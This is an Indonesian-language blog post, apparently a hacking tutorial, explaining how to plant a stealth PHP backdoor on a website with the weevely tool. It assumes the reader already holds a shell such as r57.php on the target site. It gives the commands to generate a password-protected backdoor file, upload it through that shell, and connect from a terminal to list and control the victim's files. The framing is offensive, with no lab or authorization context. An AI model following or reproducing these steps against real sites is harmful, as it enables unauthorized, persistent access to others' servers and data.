kali ini kita akan melakukan backdooring menggunakan weevely....
syarat : punya shell di situs target ex: http://target.com/uploads/r57.php
kl yang belum punya silahkan dilihat di sini... 

bagi pengguna backtrack dan blackbuntu ,weevely sudah ada ko...
tinggal jalanin aja..
Application >> pentest >> maintain access >> backdoors and rootkit >> weevely. 


setelah itu kita buat backdoornya pake perintah.
./weevely -g -o <filepath> -p <pass>
<filepatch> tempat simpan file backdoornya
<pass> password untuk backdoornya
 /home/jincorn/door.php >> tempat file backdoor
jincorn >> passwornya

coba kita ck dl file backdoornya..
udah ada tu kan door.php
setelah itu kita upload backdoornya ke situs target melalui shell yang sudah kita siapkan...
Oke..
sekarang tinggal akses aja backdoor kita dari terminal...
./weevely -t -u <url> -p <password>
<url> situs target yang udah kita tanem backdoornya
<password> pass backdoor yg tadi kita buat
oke kita tes...
pake commad "ls aja..
tukan semua file yang ada di situs target kelihatan...
sekarang terserah kita..
kita sudah tanem stealth backdoor...

Credit



0 komentar:

Post a Comment

 
Top